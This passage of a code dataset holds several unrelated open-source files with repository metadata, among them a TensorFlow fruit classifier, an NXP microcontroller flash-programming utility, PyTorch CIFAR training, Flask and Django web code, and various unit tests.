self.assertEqual(tuple(results[0].path), PATH_ABCDE) \n self.assertAlmostEqual(results[0].score, 4.0, places=3) \n self.assertEqual(tuple(results[1].path), PATH_ACE) \n self.assertAlmostEqual(results[1].score, 3.0, places=3) \n self.assertEqual(tuple(results[2].path), PATH_ABCE) \n self.assertAlmostEqual(results[2].score, 2.0, places=3) \n self.assertEqual(tuple(results[3].path), PATH_ACDE) \n self.assertAlmostEqual(results[3].score, 1.0, places=3) \n return\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","repo_name":"bmpvieira-forks/assemblyline","sub_path":"assemblyline/assemblyline/test/test_assembler2.py","file_name":"test_assembler2.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"29800141875","text":"from django.shortcuts import render,redirect\nfrom .forms import ContactForm\n\n\n\ndef home(request):\n if request.method == 'POST':\n f = ContactForm(request.POST)\n if f.is_valid():\n f.save()\n return redirect('HomePage')\n else:\n f = ContactForm()\n return render(request, 'base/index.html', {'form': f})\n\n","repo_name":"Winternight9/django-portfolio","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32337890717","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nfrom PIL import Image\nimport pathlib\nimport tensorflow as tf\nfrom tensorflow import keras\nimport cv2\nimport imghdr\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\n\n\ndata_dir = 'data'\ndata_dir =pathlib.Path(data_dir)\n\nimage_count = len(list(data_dir.glob('*/*.jpg')))\nprint(image_count)\n\n## Open the Image\napple = list(data_dir.glob('apple/*'))\n# app = Image.open(str(apple[0]))\nbanana = list(data_dir.glob('banana/*'))\n# bana = Image.open(str(banana[0]))\norange = list(data_dir.glob('orange/*'))\n# ora = Image.open(str(orange[0]))\n\"\"\" plt.imshow(app, cmap='gray')\nplt.show()\nplt.imshow(bana, cmap='gray')\nplt.show()\nplt.imshow(ora, cmap='gray')\nplt.show() \"\"\"\n\nbatch_size = 68\nimg_height = 190\nimg_width = 190\n\n# Found 733 files belonging to 3 classes.\n# Using 587 files for training.\ntrain_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir,\n validation_split=0.2,\n subset=\"training\",\n seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size) \n\n\n# Found 733 files belonging to 3 classes.\n# Using 146 files for validation.\n\nval_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir,\n validation_split=0.2,\n subset=\"validation\",\n seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n\nclass_names = train_ds.class_names\nprint(class_names) # apple, banana, orange\n\n\n# Visualize the Picture\n# plt.figure(figsize=(10, 10))\n# for images, labels in train_ds.take(1):\n# for i in range(9):\n# ax = plt.subplot(3, 3, i + 1)\n# plt.imshow(images[i].numpy().astype(\"uint8\"))\n# plt.title(class_names[labels[i]])\n# plt.axis(\"off\")\n\nfor image_batch, labels_batch in train_ds:\n print(image_batch.shape)\n print(labels_batch.shape)\n break\n\n\n# Configure the dataset for performance\n\nAUTOTUNE = tf.data.AUTOTUNE\n\ntrain_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\nval_ds = 
val_ds.cache().prefetch(buffer_size=AUTOTUNE)\n\n#Standardize the data\nnormalization_layer = layers.Rescaling(1./255)\n\nnormalized_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\nimage_batch, labels_batch = next(iter(normalized_ds))\nfirst_image = image_batch[0]\n# Notice the pixel values are now in `[0,1]`.\nprint(np.min(first_image), np.max(first_image))\n\nnum_classes = len(class_names)\nmodel = Sequential([\n layers.Rescaling(1./255, input_shape=(img_height, img_width, 3)),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(64, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Flatten(),\n layers.Dense(128, activation='relu'),\n layers.Dense(num_classes)\n])\n\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\nepochs=10\nhistory = model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=epochs\n)\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\ndata_augmentation = keras.Sequential(\n [\n layers.RandomFlip(\"horizontal\",\n input_shape=(img_height,\n img_width,\n 3)),\n layers.RandomRotation(0.1),\n layers.RandomZoom(0.1),\n ]\n)\n\nplt.figure(figsize=(10, 10))\nfor images, _ in train_ds.take(1):\n for i in range(9):\n augmented_images = data_augmentation(images)\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(augmented_images[0].numpy().astype(\"uint8\"))\n plt.axis(\"off\")\n\n\nmodel = Sequential([\n data_augmentation,\n layers.Rescaling(1./255),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(), \n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Dropout(0.2),\n layers.Flatten(),\n layers.Dense(128, activation='relu'),\n layers.Dense(num_classes ,name=\"outputs\")\n])\n\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True),\n metrics=['accuracy'])\n\n\nepochs = 18\nhistory = model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=epochs,\n \n)\n\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs_range, loss, label='Training 
Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\n\ntest_dir = 'test'\n\nfor image_class in os.listdir(test_dir):\n img = cv2.imread(os.path.join(test_dir, image_class))\n\n\napple_corr = 0\nbanana_corr = 0\norange_corr = 0\nmixed_corr = 0\n\nfor filename in os.listdir(test_dir):\n img = cv2.imread(os.path.join(\"test\", filename))\n # img_data = np.array(img)\n resize = tf.image.resize(img, (img_width, img_height))\n resize = resize.numpy().astype('uint8')\n img_array = tf.keras.utils.img_to_array(resize)\n img_array = tf.expand_dims(img_array, 0)\n predictions = model.predict(img_array)\n score = tf.nn.softmax(predictions[0])\n print(score)\n print(\n \"This image most likely belongs to {} with a {:.2f} percent confidence.\"\n .format(class_names[np.argmax(score)], 100 * np.max(score))\n )\n if class_names[np.argmax(score)] in filename:\n if class_names[np.argmax(score)] == 'apple':\n apple_corr += 1\n elif class_names[np.argmax(score)] == 'banana':\n banana_corr += 1\n elif class_names[np.argmax(score)] == 'orange':\n orange_corr += 1\n elif class_names[np.argmax(score)] == 'mixed':\n mixed_corr += 1\n\nprint(\"Apple Correct: \" + str(apple_corr))\nprint(\"Banana Correct: \" + str(banana_corr))\nprint(\"Orange Correct: \" + str(orange_corr))\nprint(\"Mixed Correct: \" + str(mixed_corr))\n\nAccuracy = (apple_corr + banana_corr + orange_corr + mixed_corr)/60\nprint(Accuracy)\n\n\nch_test_dir = 'CH_test'\ntest_ds = tf.keras.utils.image_dataset_from_directory(\n ch_test_dir,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\nevaluation = model.evaluate(test_ds)\nprint(evaluation)\n\n","repo_name":"Huigamlong/ImageClassificationCA","sub_path":"Image_Classification.py","file_name":"Image_Classification.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} {"seq_id":"559258145","text":"import logging\nimport time\nfrom time import sleep\nimport struct\nimport timeout_decorator\nfrom . import ISPConnection\nfrom .tools import calc_crc\nfrom . 
import tools\nkTimeout = 1\n\n\n###############################################################\n# Check Sum\n###############################################################\n\n\nclass ChipDescription:\n '''\n Wraps a chip description line and exposes it as a class\n '''\n kWordSize = 4 # 32 bit\n kPageSizeBytes = 64\n SectorSizePages = 16\n CRCLocation = 0x000002fc\n CRCValues = {\n \"NO_ISP\": 0x4e697370,\n \"CRP1\" : 0x12345678,\n \"CRP2\" : 0x87654321,\n \"CRP3\" : 0x43218765,\n }\n\n @property\n def MaxByteTransfer (self):\n return self.RAMBufferSize\n\n def __init__(self, descriptor: dict):\n descriptor: dict\n for name in dict(descriptor):\n self.__setattr__(name, descriptor[name])\n self.CrystalFrequency = 12000#khz == 30MHz\n self.kCheckSumLocation = 7 # 0x0000001c\n\n @property\n def sector_bytes(self):\n sector_bytes = self.SectorSizePages*self.kPageSizeBytes\n assert sector_bytes%self.kWordSize == 0\n assert sector_bytes <= self.MaxByteTransfer\n return sector_bytes\n\n def FlashAddressLegal(self, address):\n return (self.FlashRange[0] <= address <= self.FlashRange[1])\n\n def FlashRangeLegal(self, address, length):\n logging.info(f\"Flash range {self.FlashRange} {address} {length}\")\n return self.FlashAddressLegal(address) and\\\n self.FlashAddressLegal(address + length - 1) and\\\n length <= self.FlashRange[1] - self.FlashRange[0] and\\\n address%self.kPageSizeBytes == 0\n\n def RamAddressLegal(self, address):\n return self.RAMRange[0] <= address <= self.RAMRange[1]\n\n def RamRangeLegal(self, address, length):\n return self.RamAddressLegal(address) and\\\n self.RamAddressLegal(address + length - 1) and\\\n length <= self.RAMRange[1] - self.RAMRange[0] and\\\n address%self.kWordSize == 0\n\n\n\n'''\nScript tools\n'''\n\n\nassert calc_crc(bytes([0xff]*1024)) == 3090874356 # Check the software crc algorithm\n\ndef RemoveBootableCheckSum(vector_table_loc: int, image: bytes) -> bytes:\n '''\n Erases only the checksum, making the image invalid. 
The chip will reset into the ISP now.\n '''\n kuint32_t_size = 4\n MakeBootable(vector_table_loc, image)\n image_list = list(image)\n for byte in range(kuint32_t_size):\n image_list[vector_table_loc * kuint32_t_size + byte] = 0\n return bytes(image_list)\n\n\ndef GetCheckSumedVectorTable(vector_table_loc: int, orig_image: bytes) -> bytes:\n # make this a valid image by inserting a checksum in the correct place\n vector_table_size = 8\n kuint32_t_size = 4\n\n # Make byte array into list of little endian 32 bit words\n intvecs = struct.unpack(\"<%dI\"%vector_table_size,\n orig_image[:vector_table_size * kuint32_t_size])\n\n # calculate the checksum over the interrupt vectors\n intvecs_list = list(intvecs[:vector_table_size])\n intvecs_list[vector_table_loc] = 0 # clear csum value\n csum = tools.CalculateCheckSum(intvecs_list)\n intvecs_list[vector_table_loc] = csum\n vector_table_bytes = b''\n for vecval in intvecs_list:\n vector_table_bytes += struct.pack(\"<I\", vecval)\n return vector_table_bytes\n\n\ndef MakeBootable(vector_table_loc: int, orig_image: bytes) -> bytes:\n vector_table_bytes = GetCheckSumedVectorTable(vector_table_loc, orig_image)\n\n image = vector_table_bytes + orig_image[len(vector_table_bytes):]\n return image\n\n\ndef CheckFlashWrite(isp: ISPConnection, data, flash_address: int) -> bool:\n '''\n Read Memory and compare it to what was written\n '''\n\n data_read = isp.ReadMemory(flash_address, len(data))\n\n if len(data) != len(data_read):\n raise ValueError(\"Read Memory received incorrect amount of data\")\n if not isinstance(data_read, type(data)):\n raise TypeError(\"data written and data read are of different types\")\n\n return data == data_read\n\n\ndef WriteFlashSector(isp: ISPConnection, chip: ChipDescription, sector: int, data: bytes):\n '''\n Safe way to write to flash sector.\n Basic approach:\n 1. Write bytes to ram\n 2. Prep sectors for writing\n 3. Erase sector\n 4. Prep sector again\n 5. 
Copy RAM to flash\n\n To make this more robust we check that each step has completed successfully.\n After writing RAM check that the CRC matches the data in.\n After writing the Flash repeat the test\n '''\n flash_write_sleep = 0.1\n ram_write_sleep = 0.1\n ram_address = chip.RAMStartWrite\n flash_address = chip.FlashRange[0] + sector*chip.sector_bytes\n logging.info(\"\\nWriting Sector: %d\\tFlash Address: %x\\tRAM Address: %x\", sector, flash_address, ram_address)\n\n assert len(data) == chip.sector_bytes\n # data += bytes(chip.sector_bytes - len(data))\n\n logging.debug(\"Calculate starting CRC\")\n data_crc = calc_crc(data)\n ram_crc_initial = isp.ReadCRC(ram_address, num_bytes=len(data))\n\n logging.debug(\"Starting CRC: %d\", ram_crc_initial)\n\n logging.debug(\"Writing RAM %d\", ram_address)\n assert chip.RamRangeLegal(ram_address, len(data))\n sleep(ram_write_sleep)\n isp.WriteToRam(ram_address, data)\n sleep(ram_write_sleep)\n isp.reset()\n ram_crc = tools.retry(isp.ReadCRC, count=5, exception=(UserWarning, ValueError))(ram_address, num_bytes=len(data))\n\n # ram_crc = isp.ReadCRC(ram_address, num_bytes=len(data))\n isp.reset()\n if data_crc == ram_crc:\n logging.debug(f\"CRC Check successful {data_crc} {ram_crc}\")\n else:\n logging.error(f\"RAM CRC Check failed {data_crc} {ram_crc}\")\n\n # Check to see if sector is already equal to RAM, if so skip\n ram_equal = isp.MemoryLocationsEqual(flash_address, ram_address, chip.sector_bytes)\n if ram_equal:\n logging.info(\"Flash already equal to RAM, skipping write\")\n return\n\n logging.info(\"Prep Sector\")\n isp.PrepSectorsForWrite(sector, sector)\n logging.info(\"Erase Sector\")\n isp.EraseSector(sector, sector)\n sleep(flash_write_sleep)\n assert isp.CheckSectorsBlank(sector, sector)\n\n logging.info(\"Prep Sector\")\n sector_blank = isp.CheckSectorsBlank(sector, sector)\n assert sector_blank\n isp.PrepSectorsForWrite(sector, sector)\n logging.info(\"Write to Flash\")\n\n assert chip.RamRangeLegal(ram_address, chip.sector_bytes)\n assert chip.FlashRangeLegal(flash_address, chip.sector_bytes)\n\n isp.CopyRAMToFlash(flash_address, ram_address, chip.sector_bytes)\n sleep(flash_write_sleep)\n flash_crc = tools.retry(isp.ReadCRC, count=5, exception=[UserWarning])(flash_address, num_bytes=len(data))\n #flash_crc = isp.ReadCRC()\n assert flash_crc == data_crc\n assert isp.MemoryLocationsEqual(flash_address, ram_address, chip.sector_bytes)\n\n\ndef WriteSector(isp: ISPConnection, chip: ChipDescription, sector: int, data: bytes):\n assert len(data) > 0\n\n if len(data) != chip.sector_bytes: # Fill data buffer to match write size\n data += bytes([0xff] *(chip.sector_bytes - len(data)))\n WriteFlashSector(isp, chip, sector, data)\n\n #assert isp.ReadSector(sector) == data_chunk\n\n\ndef WriteBinaryToFlash(isp: ISPConnection, chip: ChipDescription, image: bytes, start_sector: int) -> int:\n '''\n Take the image as bytes object. 
Break the image into sectors and write each in reverse order.\n On completion return the flash signature which can be stored for validity checking\n '''\n flash_write_sleep = 0.25\n assert isinstance(image, bytes)\n logging.info(\"Program Length: %d\", len(image))\n\n sector_count = tools.calc_sector_count(image, chip.sector_bytes)\n if start_sector + sector_count > chip.SectorCount:\n logging.error(f\"Invalid sector count\\t Start: {start_sector}\\tCount: {sector_count}\\tEnd: {chip.SectorCount}\")\n return\n isp.Unlock()\n for sector in reversed(range(start_sector, start_sector + sector_count)):\n logging.info(f\"\\nWriting Sector {sector}\")\n data_chunk = image[(sector-start_sector) * chip.sector_bytes : (sector - start_sector + 1) * chip.sector_bytes]\n WriteSector(isp, chip, sector, data_chunk)\n time.sleep(flash_write_sleep)\n\n assert chip.FlashAddressLegal(chip.FlashRange[0]) and chip.FlashAddressLegal(chip.FlashRange[1])\n ''' Flash signature reading is only supported for some chips and is partially implemented for others.\n sleep(0.5)\n chip_flash_sig = isp.ReadFlashSig(chip.FlashRange[0], chip.FlashRange[1])\n logging.info(f\"Flash Signature: {chip_flash_sig}\")\n logging.info(\"Programming Complete.\")\n return chip_flash_sig\n '''\n\n\ndef WriteImage(isp: ISPConnection, chip: ChipDescription, imagein: bytes):\n '''\n 1. Overwrite first sector which clears the checksum bytes making the image unbootable, preventing bricking\n 2. Read the binary file into memory as a bytes object\n 3. Write the checksum to the image\n 4. Write the image in reverse order, the checksum will only be written once the entire valid image is written\n '''\n # make not bootable\n isp.Unlock()\n WriteSector(isp, chip, 0, bytes([0xde]*chip.sector_bytes))\n\n #image = RemoveBootableCheckSum(chip.kCheckSumLocation, prog)\n image = MakeBootable(chip.kCheckSumLocation, imagein)\n WriteBinaryToFlash(isp, chip, image, start_sector=0)\n\n\ndef FindFirstBlankSector(isp: ISPConnection, chip) -> int:\n '''\n Returns the first blank sector, returns the last sector on failure\n '''\n for sector in range(chip.SectorCount):\n if isp.CheckSectorsBlank(sector, chip.SectorCount - 1):\n return sector\n return chip.SectorCount - 1\n\n\ndef ReadSector(isp: ISPConnection, chip: ChipDescription, sector: int) -> bytes:\n\n start = sector*chip.sector_bytes\n assert chip.FlashRangeLegal(start, chip.sector_bytes)\n return isp.ReadMemory(start, chip.sector_bytes)\n\n\ndef ReadImage(isp: ISPConnection, chip: ChipDescription) -> bytes:\n image = bytes()\n blank_sector = FindFirstBlankSector(isp, chip)\n sectors = []\n for sector in range(blank_sector):\n logging.info(\"Sector %d\", sector)\n sector = ReadSector(isp, chip, sector)\n sectors.append(sector)\n\n return image.join(sectors)\n\n\ndef MassErase(isp: ISPConnection, chip: ChipDescription):\n last_sector = chip.SectorCount - 1\n isp.reset()\n isp.Unlock()\n isp.PrepSectorsForWrite(0, last_sector)\n isp.EraseSector(0, last_sector)\n\n\ndef InitConnection(isp: ISPConnection, chip):\n isp.reset()\n try:\n try:\n isp.SyncConnection()\n except (UserWarning, timeout_decorator.TimeoutError) as e:\n logging.error(f\"Sync Failed {e}\")\n logging.debug(\"Connect to running ISP\")\n # isp.Write(bytes(isp.kNewLine, encoding=\"utf-8\"))\n # After synchronization some devices send a second OK at the first\n # command\n isp.SetEcho(False)\n isp.SetBaudRate(isp.baud_rate)\n logging.info(\"Baudrate set to %d\", isp.baud_rate)\n isp.SetCrystalFrequency(chip.CrystalFrequency)\n isp.reset()\n except 
Exception as e:\n logging.error(e)\n raise\n","repo_name":"snhobbs/NXPISP","sub_path":"ISPProgrammer/nxp.py","file_name":"nxp.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} {"seq_id":"1577861679","text":"import torch\r\nfrom torchvision import datasets\r\nfrom torchvision import transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom lenet5 import Lenet5\r\nfrom torch import nn, optim\r\n\r\n\r\ndef main():\r\n batchsz = 32\r\n cifar_train = datasets.CIFAR10(\"cifar\", True, transform=transforms.Compose([\r\n transforms.Resize((32, 32)),\r\n transforms.ToTensor()\r\n ]), download=True)\r\n cifar_train = DataLoader(cifar_train, batch_size=batchsz, shuffle=True)\r\n\r\n cifar_test = datasets.CIFAR10(\"cifar\", False, transform=transforms.Compose([\r\n transforms.Resize((32, 32)),\r\n transforms.ToTensor()\r\n ]), download=True)\r\n cifar_test = DataLoader(cifar_test, batch_size=batchsz, shuffle=True)\r\n\r\n x, label = next(iter(cifar_train))\r\n print(\"x:\", x.shape, \"label:\", label.shape)\r\n\r\n\r\n device = torch.device('cuda')\r\n model = Lenet5().to(device)\r\n criteon = nn.CrossEntropyLoss().to(device)\r\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\r\n print(model)\r\n for epoch in range(1000):\r\n\r\n for batchidx, (x, label) in enumerate(cifar_train):\r\n # [b, 3, 32, 32]\r\n #[b]\r\n x, label = x.to(device), label.to(device)\r\n\r\n logits = model(x)\r\n # logits : [b, 10]\r\n # label : [b]\r\n # loss : tensor scalar\r\n loss = criteon(logits, label)\r\n\r\n #backprop\r\n optimizer.zero_grad()\r\n loss.backward() # gradients computed here accumulate onto the existing ones, so zero_grad() above is needed to get fresh gradients rather than a sum with the old ones\r\n optimizer.step()\r\n\r\n print(epoch, loss.item())\r\n\r\n # Practice 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Witure/My_PyTorch","sub_path":"实战1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} {"seq_id":"18457415400","text":"# Question\n# Given an array of length n+1 containing values(a[i]) where 1<=a[i]<=n. There exists one duplicate element occurring more than once while the rest of the elements occur once. 
Find that duplicate element.\n#\n# Sample Input\n# 1 4 2 5 2 3\n#\n# Sample Output\n# 2\n\ndef Duplicates(arr):\n for i in range(len(arr)):\n x = abs(arr[i])\n if arr[x-1] < 0:\n return x\n arr[x-1] = -(arr[x-1])\n\n\narr = list(map(int, input().split()))\nprint(Duplicates(arr))\n","repo_name":"shreyasl10/Algorithms","sub_path":"Arrays/FindDuplicates.py","file_name":"FindDuplicates.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21713423584","text":"import pytest\nimport requests\n\n# Define the base URL for the Flask app\nBASE_URL_CUSTOMER = 'http://127.0.0.1:5001'\nBASE_URL_SERVICE3 = 'http://127.0.0.1:5003'\n\n# Define test functions for each endpoint in app.py\n\ndef get_customer_wallet_balance(username):\n \"\"\"\n Helper function to get the wallet balance of a customer.\n \"\"\"\n response = requests.get(f'{BASE_URL_CUSTOMER}/get_customer/{username}')\n return response.json().get('wallet_balance', 0.0)\n\ndef get_good_price(good_name):\n \"\"\"\n Helper function to get the price of a good.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/get_good_details/{good_name}')\n good_details = response.json()\n return good_details.get('price', 0.0)\n\ndef test_display_available_goods_route():\n \"\"\"\n Test the /display_available_goods endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/display_available_goods')\n assert response.status_code == 200\n\ndef test_get_good_details_route():\n \"\"\"\n Test the /get_good_details/ endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/get_good_details/Laptop')\n assert response.status_code == 200\n\ndef test_make_sale_route():\n \"\"\"\n Test the /make_sale endpoint.\n\n Asserts that the status code of the response is 200 and checks if the correct amount is deducted.\n \"\"\"\n # Get the user's wallet balance before the purchase\n initial_wallet_balance = get_customer_wallet_balance(\"hemag\")\n\n # Get the good's details\n good_details_response = requests.get(f'{BASE_URL_SERVICE3}/get_good_details/laptop')\n good_details = good_details_response.json()\n\n # Extract the price from the good details\n good_price = good_details.get('price', 0.0)\n\n # Make the purchase\n response = requests.post(f'{BASE_URL_SERVICE3}/make_sale', json={\n \"customer_username\": \"hemag\",\n \"good_name\": \"laptop\"\n })\n assert response.status_code == 200\n\n # Get the user's wallet balance after the purchase\n final_wallet_balance = get_customer_wallet_balance(\"hemag\")\n\n # Check if the correct amount is deducted\n assert final_wallet_balance == (initial_wallet_balance - good_price)\n\ndef test_full_purchase_history_route():\n \"\"\"\n Test the /full_purchase_history endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/full_purchase_history')\n assert response.status_code == 200\n\ndef test_user_purchase_history_route():\n \"\"\"\n Test the /user_purchase_history/ endpoint.\n\n Asserts that the status code of the response is 200.\n \"\"\"\n response = requests.get(f'{BASE_URL_SERVICE3}/user_purchase_history/hemag')\n assert response.status_code == 200\n\n# Run the tests\n\nif __name__ == '__main__':\n pytest.main(['-v', 
'test_service3.py'])\n","repo_name":"MoSlyH1/hello","sub_path":"test_service3.py","file_name":"test_service3.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19455749630","text":"#!/usr/bin/env python\n\nimport rospy\nfrom artist_performer import BaxterController\n\ndef main():\n rospy.loginfo(\"Initializing node... \")\n rospy.init_node(\"play_xylophone\")\n controller = BaxterController()\n\n controller.set_neutral()\n\n rospy.signal_shutdown(\"Finished control\")\n\nif __name__ == '__main__':\n main()","repo_name":"jasonsbrooks/ARTIST","sub_path":"scripts/set_neutral.py","file_name":"set_neutral.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35824092907","text":"import requests\n\nfrom ..exceptions import InvalidAuthorization, DocumentNotFound, ImperialError\nfrom ..utils import ensure_json, to_snake_case, parse_dates\nfrom ..client.body import Body\n\n\ndef request(*, method: str, url: str, api_token: str = None, **kwargs) -> dict:\n # url is a hostname obj with a repr of the url\n # not sure where, but somewhere it gets converted to string,\n # but this could possibly cause issues on other versions\n\n # api_token gets mixed in with **kwargs inside Body constructor\n body = Body(method=method, api_token=api_token, **kwargs)\n headers = body.headers.copy()\n headers.update({\n \"User-Agent\": \"imperial-py; (+https://github.com/imperialbin/imperial-py)\"\n })\n\n resp = requests.request(\n method=method,\n url=url,\n headers=headers,\n params=body.params,\n json=body.json\n )\n\n json = ensure_json(resp)\n json = to_snake_case(json)\n success = json.get(\"success\", False)\n message = json.get(\"message\", None)\n\n if resp.status_code == 401:\n raise InvalidAuthorization(message, api_token=api_token)\n if resp.status_code == 404:\n raise DocumentNotFound(kwargs.get(\"document_id\", None))\n if not success:\n raise ImperialError(message)\n\n json = parse_dates(json)\n return json\n","repo_name":"imperialbin/imperial.py","sub_path":"imperial/client/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"18784347149","text":"from unittest import mock\n\nfrom controllers.login_controller import LoginController\nfrom controllers.music_data_controller import MusicDataController\nfrom src.factories.controller_factory import ControllerFactory\nfrom utils import configLoader\n\n\n@mock.patch.object(configLoader.ConfigLoader, \"load_config\")\ndef test_create_object_when_login_controller_then_return_login_controller(mock):\n cf = ControllerFactory()\n result = cf.create_object(\"login_controller\")\n assert isinstance(result, LoginController)\n\n\ndef test_create_object_when_unknown_then_return_none():\n cf = ControllerFactory()\n result = cf.create_object(\"unknown\")\n assert result is None\n\n\n@mock.patch.object(configLoader.ConfigLoader, \"load_config\")\ndef test_create_object_when_music_data_controller_then_return_music_data_controller(mock):\n cf = ControllerFactory()\n result = cf.create_object(\"music_controller\")\n assert isinstance(result, 
MusicDataController)\n","repo_name":"prannoymulmi/Music-Storage-System","sub_path":"tests/factories/test_controller_factory.py","file_name":"test_controller_factory.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} {"seq_id":"5611099726","text":"from flask import Flask, jsonify\nfrom flask_cors import CORS\n\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\nCORS(app)\n\n# Set up MongoDB connection\nclient = MongoClient('mongodb://localhost:27017/')\ndb = client['scrapper']\ncollection = db['commissioners']\norganizationsCollection = db['organizations']\nrolesCollection = db['roles']\n\n\n# Define route to retrieve commissioner data\n@app.route('/commissioners', methods=['GET'])\ndef get_commissioners():\n commissioners = []\n for commissioner in collection.find():\n commissioners.append({\n 'name': commissioner['name'],\n 'role': commissioner['role'],\n 'organization': commissioner['organization'],\n 'image': commissioner['image'],\n 'profileLink': commissioner['profileLink'],\n 'address': commissioner['address'],\n 'address2': commissioner['address2'],\n 'myTeamsLink': commissioner['myTeamsLink'],\n 'team': commissioner['team']\n })\n return jsonify(commissioners)\n\n\n@app.route('/roles', methods=['GET'])\ndef get_roles():\n roles = []\n for role in rolesCollection.find():\n print(role)\n roles.append({\n 'name': role['name']\n })\n print(roles)\n return jsonify(roles)\n\n\n@app.route('/organizations', methods=['GET'])\ndef get_organizations():\n organizations = []\n for organization in organizationsCollection.find():\n organizations.append({\n 'name': organization['name']\n })\n return jsonify(organizations)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=4554)\n","repo_name":"Mushi42/python-gram-bot","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} {"seq_id":"8607490817","text":"from django.core.management import BaseCommand, CommandError\nimport os\nimport json\nfrom products.models import Category\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('--file', '-f', type=str)\n\n def handle(self, *args, **options):\n file_path = options.get('file')\n if not file_path:\n raise CommandError('File not provided')\n if not file_path.endswith('.json'):\n raise CommandError('Only .json file supported')\n\n file_path = os.path.join('data', file_path)\n try:\n with open(file_path) as import_file:\n categories = json.load(import_file)\n except FileNotFoundError as e:\n raise CommandError('File at %s not found: ' % os.path.join('data', file_path))\n\n for category in categories:\n db_categories = Category(\n name=category['name']\n )\n 